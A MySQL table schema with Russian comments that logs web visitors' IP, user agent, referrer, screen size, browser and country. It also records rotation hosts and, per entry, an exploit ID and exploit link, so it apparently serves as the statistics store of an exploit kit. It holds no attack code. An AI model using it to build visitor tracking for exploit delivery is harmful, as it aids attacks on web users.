CREATE TABLE `{table}` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `ip` varchar(15) NOT NULL,
  `ua` varchar(255) NOT NULL,
  `referer` varchar(255) CHARACTER SET utf8 DEFAULT NULL,
  `referer_host` varchar(255) CHARACTER SET utf8 DEFAULT NULL,
  `offset` int(2) DEFAULT NULL COMMENT 'тайм зона',
  `time` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP COMMENT 'время ответа запроса',
  `width` int(4) DEFAULT NULL COMMENT 'ширина экрана',
  `heigth` int(4) DEFAULT NULL COMMENT 'высота  экрана',
  `os` varchar(255) NULL,
  `browser` varchar(255) NULL,
  `version` int(5) NULL,
  `lang` varchar(15) NULL,
  `country` varchar(2) DEFAULT NULL ,
  `uniq_id` varbinary(255) NOT NULL,
  `uniq` varbinary(255) NOT NULL,
  `type` int(1) NULL COMMENT '0 - in 1 - pre 2 - out, 3 -drop, 4 - ban, 5 - unban, 6 uniq',
  `code` int(2) NULL,
  `rotation_id` int(10) unsigned NULL COMMENT 'откуда пришел запрос host_id',
  `rotation_host` varchar(255) CHARACTER SET utf8 DEFAULT NULL,
  `exploit_id` int(10) unsigned NULL DEFAULT NULL,
  `exploit_link` varchar(255) CHARACTER SET utf8 DEFAULT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY (`uniq`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;